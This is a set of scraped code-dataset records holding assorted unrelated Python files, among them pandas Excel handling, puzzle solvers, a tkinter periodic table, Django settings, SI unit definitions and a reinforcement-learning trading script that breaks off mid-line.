engagements\n","sub_path":"lp_api_wrapper/apis/engagement_history.py","file_name":"engagement_history.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647236065","text":"import pandas as pd\n\nexcel_file='Sample_data.xlsx'\nbatches=pd.read_excel(excel_file)\n\nprint(batches.head())\n\nbatches_sheet1=pd.read_excel(excel_file,sheet_name=0,index_col=0)\nprint(batches_sheet1)\n\nxlsx=pd.ExcelFile(excel_file)\nbatches_sheets=[]\n\nfor sheet in xlsx.sheet_names:\n\tprint(sheet)\n\n\tbatches_sheets.append(xlsx.parse(sheet))\n\nbatches=pd.concat(batches_sheets)\nprint(batches_sheets)\n","sub_path":"pandas_excel_operations.py","file_name":"pandas_excel_operations.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249309366","text":"# Default imports\nimport pandas as pd\n\n# Data\nny_housing = pd.read_csv('data/train.csv')\n# Selecting 4 most relevant variables from the dataset fot the Cleaning and Preprocessing.\nhousing_data = ny_housing[['MasVnrArea', 'GrLivArea', 'LotShape', 'GarageType', 'SalePrice']]\n\n\n# Write your code here:\ndef outlier_removal(dataset):\n for i in dataset.columns:\n if dataset[i].dtypes == 'int64' or dataset[i].dtypes == 'float64':\n th = dataset[i].quantile(0.95)\n data = dataset[dataset[i]< th]\n data = data[1:1306]\n return data\n","sub_path":"q02_outlier_removal/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"103739469","text":"\n\nclass Menu():\n\n def __init__(self,name):\n self.parentMenu = None\n self.childMenu = {}\n self.siblinMenu = None\n self.name = name \n self.actionName = None \n\n def action(self):\n print(self.name+\" has been selected.\")\n if len(self.childMenu):\n for m in self.childMenu:\n print(m)\n\n inp_option = str(input(\"Please select of the options\")).rstrip().lstrip()\n self.childMenu[inp_option].action()\n else:\n print(self.name+\" action has been performed.\")\n return 1\n\n\n def addChildMenu(self,cname):\n self.childMenu[cname] = Menu(cname)\n self.childMenu[cname].parentMenu = self \n return self.childMenu[cname]\n \n\n\n\nclass MainMenu():\n \n def __init__(self):\n \"\"\"\n Handles all the menu and the state of the system \n \"\"\"\n pass\n\n\n\nclass EmployeeData():\n\n def __init__(self,name,id):\n self.name = name \n self.id = id\n\n def getdata():\n data = \"Name : \"+self.name + \"; Id: \"+ self.id \n return data \n\n def upadateData(name=None,id=None):\n if name:\n self.name \n if id:\n self.id = id\n\n \n\nif __name__ == \"__main__\":\n m = Menu(\"MainMenu\");\n c = m.addChildMenu(\"Create\")\n c.addChildMenu(\"Type Senior\")\n c.addChildMenu(\"Type Junior\")\n\n m.action()\n","sub_path":"pythonCodes/simulateMenu.py","file_name":"simulateMenu.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119921747","text":"import os\nimport sys\nimport textwrap\n\nimport click\n\ntry:\n from IPython.terminal.embed import InteractiveShellEmbed as InteractiveConsole\n is_ipython = True\nexcept ImportError:\n from code import InteractiveConsole\n is_ipython = False\n\nfrom eth_rpc_client import Client\n\nimport populus\nfrom populus import utils\nfrom populus.contracts import (\n package_contracts,\n)\n\nfrom .main import main\n\n\n@main.command()\ndef attach():\n \"\"\"\n Enter a python shell with contracts and blockchain client\n available.\n \"\"\"\n project_dir = os.path.abspath(os.getcwd())\n contracts_meta = utils.load_contracts(project_dir)\n\n context = {\n 'contracts': package_contracts(contracts_meta),\n 'client': Client('127.0.0.1', '8545'),\n }\n\n contract_names = ', '.join(sorted(contracts_meta.keys()))\n\n banner = textwrap.dedent(\n \"\"\"\n Python: {python_version}\n\n Populus: v{populus_version}\n\n Project Path: {project_dir}\n\n contracts -> Contract classes\n client -> Blockchain client ({client_type})\n\n Contracts: {contracts}\n \"\"\"\n ).format(\n python_version=sys.version.partition('\\n')[0],\n populus_version=populus.__version__,\n project_dir=project_dir,\n client_type=\"json-rpc\",\n contracts=click.wrap_text(\n contract_names, initial_indent='', subsequent_indent=' ' * 4,\n ),\n ).strip()\n\n if is_ipython:\n shell = InteractiveConsole(user_ns=context)\n else:\n shell = InteractiveConsole(context)\n shell.interact(banner)\n","sub_path":"populus/cli/attach_cmd.py","file_name":"attach_cmd.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17727042","text":"#!/usr/bin/env python\n# BSD Licence\n# Copyright (c) 2011, Science & Technology Facilities Council (STFC)\n# All rights reserved.\n#\n# See the LICENSE file in the source distribution of this software for\n# the full license text.\n\n# subset_2d_cdat.py\n#\n#\n# Scripts implementing this test should subset a dataset to a given\n# bounding box. Scripts can assume the given variable is a 2D field.\n#\n# usage: %prog dataset variable bbox outputfile\n#\n# where bbox = 'lon0,lon1,lat0,lat1'\n\nimport sys\nimport cdms2\n\ndataset, variable, bbox, outfile = sys.argv[1:]\n\nlon0, lon1, lat0, lat1 = (float(x) for x in bbox.split(','))\n\nds = cdms2.open(dataset)\nvar = ds[variable]\n\nsubset = var(longitute=(lon0, lon1),\n latitude=(lat0, lat1))\n\nout_ds = cdms2.open(outfile, 'w')\nout_ds.write(subset)\n\nout_ds.close()\n","sub_path":"scripts/clients/subset2d_cdat.py","file_name":"subset2d_cdat.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367878131","text":"dy = [1,-1,0,0]\ndx = [0,0,-1,1]\nfrom collections import deque\ndef solution(maps):\n n = len(maps)\n m = len(maps[0])\n visit = [[False for i in range(m)] for i in range(n)]\n flag = False\n q = deque()\n q.append((0,0))\n visit[0][0] = True\n\n while q:\n y,x = q.popleft()\n\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if 0<= ny < n and 0<= nx < m and maps[ny][nx] != 0 and visit[ny][nx] == False:\n v = maps[y][x] + 1\n if maps[ny][nx] != 1:\n maps[ny][nx] = min(v,maps[ny][nx])\n else:\n maps[ny][nx] = v\n visit[ny][nx] = True\n\n q.append((ny,nx))\n\n if y == n-1 and x == m-1:\n flag = True\n break\n\n if flag :\n return maps[-1][-1]\n else:\n return -1\n\n\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,1],[0,0,0,0,1]]))\nprint(solution([[1,0,1,1,1],[1,0,1,0,1],[1,0,1,1,1],[1,1,1,0,0],[0,0,0,0,1]]))","sub_path":"Programmers/Programmers_프로그래밍 마에스터_게임 맵 최단거리.py","file_name":"Programmers_프로그래밍 마에스터_게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490375812","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\n\nclass Ball:\n\n def __init__(self, i, j):\n self.i = i\n self.j = j\n self.pair = None\n self.state = 'stop'\n\n def is_wall_or_ball(self, ni, nj):\n global board\n\n value = board[ni][nj]\n if value == '#':\n return True\n elif self.pair.i == ni and self.pair.j == nj and not self.pair.state == 'goal': # 자신의 페어가 '골'상태인 경우 무시한다.\n return True\n return False\n\n def move(self, direction):\n global board\n\n d = [(-1, 0), (1, 0), (0, -1), (0, 1)] # 상 하 좌 우\n\n dx = d[direction][0]\n dy = d[direction][1]\n\n i = self.i\n j = self.j\n\n # 다음 좌표\n ni = i + dx\n nj = j + dy\n\n if board[ni][nj] == 'O': # 골일땐 상태를 골로 바꾼다\n self.state = 'goal'\n\n elif not self.is_wall_or_ball(ni, nj): # 벽이 아니면 자신의 위치를 해당 위치로 변경한다\n self.i = ni\n self.j = nj\n\n else: # 벽 또는 다른 공이 있으면 상태를 멈춤으로 바꾼다.\n self.state = 'stop'\n\n\ndef who_first_move(who, red, blue, direction): # 누가 먼저 움직이는지, 움직일 빨간공인스턴스,파란공 인스턴스, 움직일 방향\n red.state = 'move'\n blue.state = 'move'\n\n while True: # 두 공의 상태가 모두 'stop' 또는 'goal'의 상태에 있을때까지 순서대로 움직인다\n if who == 'blue':\n if blue.state == 'move':\n blue.move(direction)\n if red.state == 'move':\n red.move(direction)\n\n elif who == 'red':\n if red.state == 'move':\n red.move(direction)\n if blue.state == 'move':\n blue.move(direction)\n\n if red.state in ['stop', 'goal'] and blue.state in ['stop', 'goal']:\n break\n\n\ndef BFS(red_start, blue_start):\n # 큐의 시작은 [첫 시작 위치의 빨간공 인스턴스, 첫 시작 위치의 파란공 인스턴스, 지금까지 기울인 방향들, 직전에 쓴 방향]\n q = [[red_start, blue_start, [], set()]]\n\n while q:\n prev_red, prev_blue, moving, prev = q.pop(0)\n if moving[-3:] not in [[0, 1, 0], [1, 0, 1], [2, 3, 2], [3, 2, 3]]: # 지금까지 기울인 방향이 제자리로 돌아오는 경우는 제외한다 (예로 상 하 상)\n\n for direction in {0, 1, 2, 3} - prev: # 다음에 기울일 방향은 직전에 기울인 방향을 뺀 나머지 방향이다.\n # 주소 복사를 방지하기 위해 움직이기 전 위치의 각 객체들을 생성\n red = Ball(prev_red.i, prev_red.j)\n blue = Ball(prev_blue.i, prev_blue.j)\n red.pair = blue\n blue.pair = red\n\n if direction == 0: # 위로 기울기 - > i 작은놈 먼저 움직임\n if red.i > blue.i:\n who_first_move('blue', red, blue, direction) # 파란거 먼저 움직이기\n else:\n who_first_move('red', red, blue, direction) # 빨간거 먼저 움직이기\n elif direction == 1: # 아래로 기울기 -> i 큰놈 먼저 움직임\n if red.i > blue.i:\n who_first_move('red', red, blue, direction)\n else:\n who_first_move('blue', red, blue, direction)\n elif direction == 2: # 왼쪽으로 기울기 -> j 작은놈 먼저 움직임\n if red.j > blue.j:\n who_first_move('blue', red, blue, direction)\n else:\n who_first_move('red', red, blue, direction)\n elif direction == 3: # 오른쪽으로 기울기 -> j 큰놈 먼저 움직임\n if red.j > blue.j:\n who_first_move('red', red, blue, direction)\n else:\n who_first_move('blue', red, blue, direction)\n\n # 아래부터는 해당하는 방향으로 구슬이 모두 옮겨진 이후 ..\n next_moving = moving + [direction]\n\n if red.state == 'goal' and blue.state == 'goal':\n pass\n elif blue.state == 'goal':\n pass\n elif red.state == 'goal':\n return len(next_moving)\n elif len(next_moving) < 10:\n q.append([red, blue, next_moving, {direction}])\n\n return -1\n\n\n# import timeit\n# start = timeit.default_timer()\n\nN, M = map(int, input().split())\nboard = [list(input()) for _ in range(N)]\n\n# 공의 초기 위치 찾기\nfor i in range(N):\n for j in range(M):\n if board[i][j] == 'R':\n red_ball = Ball(i, j)\n elif board[i][j] == 'B':\n blue_ball = Ball(i, j)\n\n# 각 공들의 쌍 이뤄주기\nred_ball.pair = blue_ball\nblue_ball.pair = red_ball\n\n# 탐색 시작\nprint(BFS(red_ball, blue_ball))\n\n# end = timeit.default_timer()\n# print(\"{}ms\".format((end - start) * 1000))\n","sub_path":"PYTHON/BAEKJOON/13460_구슬탈출2/13460_2.py","file_name":"13460_2.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369949785","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/env python\n\nimport os\nfrom tkinter import *\n\n##import PIL as pl\n\ndd = []\n\n\ndef callback(event):\n print(dir(event))\n print(\"you clicked at\", event.x, event.y, event.x_root)\n print(event.char, event.keycode, event.widget)\n\n\ndef elem(k):\n print((' k %d' % k))\n\n\ndef read_elements():\n import csv\n elm = {}\n eln = {}\n with open(os.path.join(os.path.dirname(__file__), 'elements.csv'), \"r\") as flf:\n rr = csv.DictReader(flf, delimiter='\\t')\n for rw in rr:\n elm[rw['El']] = {'NN': int(rw['NN']), 'Ro': rw['Ro'], 'A': rw['A']}\n eln[int(rw['NN'])] = {'name': rw['El'], 'Ro': rw['Ro'], 'A': rw['A']}\n\n pass\n\n return (eln, elm)\n\n\ndef read_elements_x(name):\n with open(name, 'rt') as xfl:\n be = {}\n xfl.readline()\n for line in xfl:\n t = line.split()\n be[int(t[0])] = [t[1], float(t[2]), float(t[3])]\n sn = {}\n for k in list(be.keys()):\n sn[be[k][0]] = int(k)\n return (be, sn)\n\n\ndef min0ne(f):\n def tmp(*args, **kwargs):\n res = f(*args, **kwargs)\n\n return res[0] - 1, res[1] - 1\n\n return tmp\n\n\n@min0ne\ndef z2rc(Z_):\n \"\"\"\n \"\"\"\n endCol_ = 18\n\n if Z_ == 1:\n return (1, 1)\n if Z_ == 2:\n return (1, endCol_)\n\n if Z_ in (3, 4):\n return (2, 1 + Z_ - 3)\n if Z_ in range(5, 11):\n return (2, 8 + Z_)\n\n if Z_ in (11, 12):\n return (3, 1 + Z_ - 11)\n if Z_ in range(13, 19):\n return (3, Z_)\n\n if Z_ in range(19, 37):\n return (4, 1 + Z_ - 19)\n if Z_ in range(37, 55):\n return (5, 1 + Z_ - 37)\n\n if Z_ in (55, 56, 57):\n return (6, 1 + Z_ - 55)\n if Z_ in range(72, 87):\n return (6, 4 + Z_ - 72)\n\n if Z_ in (87, 88, 89):\n return (7, 1 + Z_ - 87)\n if Z_ in range(104, 115):\n return (7, 4 + Z_ - 104)\n\n if Z_ in range(58, 72):\n return (8, 4 + Z_ - 58)\n if Z_ in range(90, 104):\n return (9, 4 + Z_ - 90)\n return (0, 0)\n\n \"\"\" \"\"\"\n\n\ndef tblMendel(frame, n):\n dmt = read_elements()[0]\n lb = []\n for k in range(1, n):\n i, j = z2rc(k)\n b = Button(frame, text=str(k) + ':' + dmt[k]['name'], relief=RIDGE, command=(lambda k=k: elem(k)))\n b.grid(row=i, column=j, sticky=NSEW)\n ## b.bind(\"\", callback)\n lb.append(b)\n\n\ndef main():\n \"\"\" \"\"\"\n a = Toplevel()\n tblMendel(a, 100)\n # mainloop()\n a.quit()\n # a.destroy()\n\n\nif __name__ == '__main__':\n ## for i in range(1,114):\n ## print(z2rc(i))\n root = Toplevel()\n ## gridtable((root))\n ## packbox(Toplevel(root))\n ## Button(root, text=’Quit’, command=root.quit).pack()\n main()\n mainloop()\n print(dd)\n","sub_path":"mendeleev.py","file_name":"mendeleev.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339134565","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 18 14:22:04 2018\r\n\r\n@author: Invisible-Tilkey\r\n\"\"\"\r\n\r\n#%%\r\nimport tensorflow as tf\r\n# TF库与Numpy库类似 尽量多用float32\r\n\r\n#声明tf下的Variable\r\nnum = tf.Variable(0)\r\n\r\n\r\n#调用tf的add函数进行递加\r\nnew_num = tf.add(num, tf.constant(1))\r\n\r\n#调用tf的assign函数进行赋值\r\nupdate = tf.assign(num, new_num)\r\n\r\n#打开Session计算块\r\nwith tf.Session() as sess:\r\n\r\n #初始化/执行 全球变量\r\n sess.run(tf.global_variables_initializer())\r\n \r\n #通过sess.run(变量)进行输出\r\n print(sess.run(num))\r\n \r\n #循环结\r\n for _ in range(3):\r\n sess.run(update)\r\n print (sess.run(num))\r\n \r\n#保存当前session的方式\r\n #save_path = saver.save(sess, \"D://tensorflow//model//test180918\")\r\n #%%","sub_path":"some_my_not_yet_ordered_practicing/VariableCreate2.py","file_name":"VariableCreate2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267623698","text":"# 2037. Minimum Number of Moves to Seat Everyone\n# 2021/10/18\n# vbc 63\n\n# Runtime: 102 ms, faster than 20.00% of Python3 online submissions for Minimum Number of Moves to Seat Everyone.\n# Memory Usage: 14.3 MB, less than 50.00% of Python3 online submissions for Minimum Number of Moves to Seat Everyone.\n\n# 这题只是很直觉的排序后,1-1对应的来分配学生的seat,然后就过了\n# 要严格证明感觉不是那么容易 \n\nclass Solution:\n def minMovesToSeat(self, seats: List[int], students: List[int]) -> int:\n ans = 0\n for seat, stu in zip(sorted(seats), sorted(students)):\n ans += abs(seat - stu)\n return ans\n","sub_path":"2037. Minimum Number of Moves to Seat Everyone.py","file_name":"2037. Minimum Number of Moves to Seat Everyone.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621797556","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom unity import Unit\n\"\"\"https://en.wikipedia.org/wiki/SI_derived_unit\"\"\"\n\ns_ = Unit(T=1) # second\nm_ = Unit(L=1) # meter\nkg_ = Unit(M=1) # kilogram\nA_ = Unit(I=1) # ampere\nK_ = Unit(Θ=1) # kelvin\nmol_ = Unit(N=1) # mole\ncd_ = Unit(J=1) # candela\n\nns_ = s_ * 1e-9\nµs_ = s_ * 1e-6\nms_ = s_ * 1e-3\nmin_ = s_ * 60\nhour_ = s_ * 3600\nday_ = hour_ * 24\nyear_ = Unit( 365*day_ + 5*hour_ + 48*min_ + 45*s_ ) # mean tropical year\nweek_ = day_*7\nmonth_ = year_/12\n\nÅ_ = ang_ = m_ * 1e-10 # Ångström\nnm_ = m_ * 1e-9\nµm_ = m_ * 1e-6\nmm_ = m_ * 1e-3\ncm_ = m_ * 1e-2\nkm_ = m_ * 1e3\nau_ = m_ * 149597870700 # astronomical unit\nly_ = m_ * 9460730472580800 # light-year\npc_ = m_ * 3.085677581e16 # parsec\n\ng_ = kg_ * 1e-3\nng_ = g_ * 1e-9\nµg_ = g_ * 1e-6\nmg_ = g_ * 1e-3\n\nL_ = m_ ** 3 * 1e-3\nmL_ = L_ * 1e-3\ncL_ = L_ * 1e-2\n\n\nHz_ = s_ ** -1 # hertz\nkHz_ = Hz_ * 1e3\nMHz_ = Hz_ * 1e6\nGHz_ = Hz_ * 1e9\nN_ = Unit(M= 1, L= 1, T=-2) # newton\nkN_ = N_ * 1e3\nPa_ = Unit(M= 1, L=-1, T=-2) # pascal\nhPa_ = Pa_ * 1e2\nkPa_ = Pa_ * 1e3\nMPa_ = Pa_ * 1e6\nGPa_ = Pa_ * 1e9\nJ_ = Unit(M= 1, L= 2, T=-2) # joule\nkJ_ = J_ * 1e3\nMJ_ = J_ * 1e6\nGJ_ = J_ * 1e9\nW_ = Unit(M= 1, L= 2, T=-3) # watt\nkW_ = W_ * 1e3\nMW_ = W_ * 1e6\nGW_ = W_ * 1e9\nWh_ = W_ * hour_\nkWh_ = Wh_ * 1e3\nMWh_ = Wh_ * 1e6\nGWh_ = Wh_ * 1e9\nC_ = Unit(T= 1, I=1) # coulomb\nV_ = Unit(M= 1, L= 2, T=-3, I=-1) # volt\nµV_ = V_ * 1e-6\nmV_ = V_ * 1e-3\nF_ = Unit(M=-1, L=-2, T= 4, I= 2) # farad\nΩ_ = ohm_ = Unit(M= 1, L= 2, T=-3, I=-2) # ohm\nmΩ_ = mohm_ = Ω_ * 1e-3\nkΩ_ = kohm_ = Ω_ * 1e3\nMΩ_ = Mohm_ = Ω_ * 1e6\nGΩ_ = Gohm_ = Ω_ * 1e9\nS_ = Unit(M=-1, L=-2, T= 3, I= 2) # siemens\nWb_ = Unit(M= 1, L= 2, T=-2, I=-1) # weber\nT_ = Unit(M= 1, T=-2, I=-1) # tesla\nH_ = Unit(M= 1, L= 2, T=-2, I=-2) # henry\n\ndel Unit\n","sub_path":"si_units.py","file_name":"si_units.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641673124","text":"import hashlib\r\nimport base64\r\n\r\ndef encrypt_md5(word):\r\n lol = hashlib.md5(word.encode())\r\n encrypt_md5.md5 = lol.hexdigest()\r\n \r\n\r\ndef encode_base64(word):\r\n la = word.encode(\"ascii\")\r\n la2 = base64.b64encode(la)\r\n la3 = la2.decode(\"ascii\")\r\n encode_base64.result = la3\r\n \r\ndef decode_base64(word):\r\n la = word.encode(\"ascii\")\r\n la2 = base64.b64decode(la)\r\n la3 = la2.decode(\"ascii\")\r\n decode_base64.result = la3\r\n","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"607392606","text":"#!/usr/bin/env python\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom src.interface import Interface\nfrom copy import copy\n\n\ninput_size = Interface.get_input_size()\noutput_size = Interface.get_output_size()\n\nmodel = keras.Sequential([\n keras.layers.Dense(input_size),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(1024, activation='relu'),\n keras.layers.Dense(output_size, activation='softmax')\n])\n\nmodel.compile(optimizer='adadelta',\n loss='binary_crossentropy',\n metrics=['accuracy'])\n\ncp_dir = 'legal_moves'\n\nsess = tf.Session()\n\nboard = Interface()\nwhile not board.is_terminal():\n current_board = copy(board)\n\n input_vector = current_board.get_input()\n output_vector = model.predict(input_vector)\n\n\n legal_moves = current_board.get_moves()\n tried = {}\n for move in legal_moves:\n # tried, win\n tried[move] = (0, 0, 0)\n\n\n\n\nres = board.get_result()","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590766795","text":"\"\"\"\nBase django settings for {{cookiecutter.repo_name}} project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport dj_database_url\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.getenv(\"DJANGO_SECRET_KEY\", False)\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.getenv(\"DJANGO_DEBUG\", False) in [\"True\", \"1\", \"yes\", \"true\", \"TRUE\", \"on\", \"ON\", \"On\"]\nTEMPLATE_DEBUG = DEBUG\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = os.getenv(\"DJANGO_ALLOWED_HOSTS\", \"\").split(\",\")\n\n\n\nROOT_URLCONF = '{{ cookiecutter.repo_name }}.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = '{{ cookiecutter.repo_name }}.wsgi.application'\n\n# A tuple that lists people who get code error notifications when DEBUG=False\nADMINS = (\n (\"{{ cookiecutter.author_name }}\", \"{{ cookiecutter.email }}\")\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {'default': dj_database_url.config()}\n\n# https://docs.djangoproject.com/en/stable/topics/i18n/\nLANGUAGE_CODE = '{{ cookiecutter.language_code }}'\n\nTIME_ZONE = 'Europe/Brussels'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = os.getenv(\"DJANGO_STATIC_URL\", '/static/')\nMEDIA_URL = os.getenv(\"DJANGO_MEDIA_URL\", '/media/')\nSTATIC_ROOT = os.getenv(\"DJANGO_STATIC_ROOT\", 'static')\nMEDIA_ROOT = os.getenv(\"DJANGO_MEDIA_ROOT\", 'media')\n\nDJANGO_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n)\nTHIRD_PARTY_APPS = (\n 'debug_toolbar',\n 'django_extensions',\n 'djangobower',\n # 'crispy_forms',\n)\n\nLOCAL_APPS = (\n '{{ cookiecutter.repo_name }}',\n)\n\nINSTALLED_APPS = LOCAL_APPS + DJANGO_APPS + THIRD_PARTY_APPS\n\nBOWER_INSTALLED_APPS = (\n 'bootstrap-sass#3.3.4',\n 'jquery#<2'\n # 'underscore',\n)\n\n# E-mail:\nSERVER_EMAIL = 'webserver '\nEMAIL_HOST = os.getenv(\"DJANGO_EMAIL_HOST\", \"localhost\")\nEMAIL_PORT = os.getenv(\"DJANGO_EMAIL_PORT\", 587)\nEMAIL_HOST_USER = os.getenv(\"DJANGO_EMAIL_HOST_USER\", \"\")\nEMAIL_HOST_PASSWORD = os.getenv(\"DJANGO_EMAIL_HOST_PASSWORD\", \"\")\nDEFAULT_FROM_EMAIL = \"Website \"\n\nif DEBUG:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n","sub_path":"{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20419221","text":"import sys\nimport os\n\nfrom agent import Agent\nfrom functions_dataframe import *\nimport models_features as mf\n\nif len(sys.argv) != 4:\n print(sys.argv)\n print(\"Usage: python train.py [stock] [window] [episodes]\")\n exit()\n\nargs = {\n 'stock_name': '',\n 'window_size': 50,\n 'batch_size': 32,\n 'episode_count': '',\n 'selected_model': 'baseline'\n}\n\nexclude_variables = ['next_close', 'next_returns', 'done']\n\nargs['stock_name'], \\\n args['window_size'], \\\n args['episode_count'] = \\\n sys.argv[1], \\\n int(sys.argv[2]), \\\n int(sys.argv[3])\n\nagent = Agent(args['window_size'])\ndata = get_train_data(args['stock_name'])\n\n# data = data.head(1000)\n\ndata['next_close'] = data['close'].shift(-1)\ndata['next_close_diff'] = (data['next_close'] - data['close']) / data['close']\n\ndata['prev_close'] = data['close'].shift(1)\ndata['returns_eur'] = (\n (data['close'] - data['prev_close']) /\n data['prev_close']\n) + 1\ndata['returns_btc'] = (\n (1 / data['close'] - 1 / data['prev_close']) /\n (1 / data['prev_close'])\n) + 1\ndata['close_diff'] = (data['close'] - data['prev_close']) / data['prev_close']\ndata['close_diff'].fillna(0, inplace=True)\ndata['diff'] = data['close'] - data['prev_close']\n\ndata['ideal_decision'] = data['next_close_diff'] / \\\n (data['next_close_diff'].map(np.abs))\ndata['ideal_decision'] = data['ideal_decision'].fillna(0)\n\n# print(data)\n\nrows = len(data) - 1\nbatch_size = 32\n\nmodel_dir = \"output/models/{}\".format(args['selected_model'])\nif not os.path.isdir(model_dir):\n os.makedirs(model_dir)\n\nmodel_cols = len(mf.models_features[args['selected_model']]['features']) - \\\n len(exclude_variables)\n\ninput_features = [\n column for column in\n mf.models_features[args['selected_model']]['features']\n if column not in exclude_variables\n]\n\nfor e in range(args['episode_count'] + 1):\n file_path = \"{}/model_ep{}\".format(model_dir, str(e))\n print(\n \"******************************\"\n \"Episode {:06d}/{:06d}\"\n \"******************************\".format(\n e,\n args['episode_count']\n )\n )\n\n if os.path.isfile(file_path):\n agent.load(file_path)\n print(\"Model already trained, loading it\")\n continue\n\n roll_step = 0\n\n w = data.loc[\n (\n args['window_size'] + 1 + roll_step\n ):(\n 2 * args['window_size'] + roll_step\n ),\n input_features\n ]\n\n print(\n len(w),\n len(w) * model_cols\n )\n\n state_data = np.empty(\n len(w) * model_cols,\n dtype=np.float32\n )\n\n for col in range(model_cols):\n curr_col = mf.models_features[args['selected_model']]['features'][col]\n if curr_col not in exclude_variables:\n state_data[col::model_cols] = w.loc[\n :,\n curr_col\n ].values\n\n state = np.array([\n get_state(state_data)\n ])\n\n state_transitions = pd.DataFrame({\n 'step': [],\n 'action': [],\n 'prev_action': [],\n 'curr_action': [],\n 'state': [],\n 'next_state': [],\n 'balance_fiat': [],\n 'balance_coin': [],\n 'balance_value': [],\n 'change': [],\n 'epsilon': [],\n 'gamma': []\n })\n\n curr_action = 2\n\n transition_args = {\n 'epoch': e,\n 'batch_size': args['batch_size'],\n 'selected_model': args['selected_model'],\n 'features': mf.models_features[args['selected_model']]['features'],\n 'exclude_variables': exclude_variables,\n 'agent': agent,\n 'state': state,\n 'curr_action': curr_action,\n 'inactive_balance': 0.0,\n 'balance_fiat': 1.0,\n 'balance_coin': 0.0,\n 'balance_value': 1.0,\n 'slippage': 0.0,\n 'inactive_balance_history': [0.0] * args['window_size'],\n 'active_balance_history': [1.0] * args['window_size'],\n 'balance_value_history': [1.0] * args['window_size']\n }\n\n for roll_step in range(\n args['window_size'],\n len(data) - args['window_size'] - 1\n ):\n\n w = data.loc[\n (roll_step):(args['window_size'] + roll_step - 1),\n mf.models_features[args['selected_model']]['features']\n ]\n\n train_results = train_state_ta(\n w,\n **transition_args\n )\n\n state_transitions = state_transitions.append(\n train_results,\n ignore_index=True\n )\n\n transition_args['curr_action'] = train_results['curr_action']\n transition_args['prev_action'] = train_results['prev_action']\n transition_args['balance_fiat'] = train_results['balance_fiat']\n transition_args['balance_coin'] = train_results['balance_coin']\n transition_args['balance_value'] = train_results['balance_value']\n transition_args['state'] = train_results['next_state']\n\n transition_args['balance_value_history'].append(\n train_results['balance_value']\n )\n\n transition_args['agent'].memory.append(\n (\n np.array([\n train_results['state'][0]\n ]),\n train_results['action'],\n max(0, train_results['change']),\n np.array([\n train_results['next_state'][0]\n ]),\n w.tail(1)['done'].values[0]\n )\n )\n\n if len(transition_args['agent'].memory) > args['batch_size']:\n transition_args['agent'].experiment_replay(args['batch_size'])\n\n # print(transition_args)\n\n transitions_file = transitions_path.format(\n args['selected_model'],\n stock_name,\n window_size,\n e\n )\n transitions_dir = os.path.dirname(transitions_file)\n if not os.path.isdir(transitions_dir):\n os.makedirs(transitions_dir)\n\n 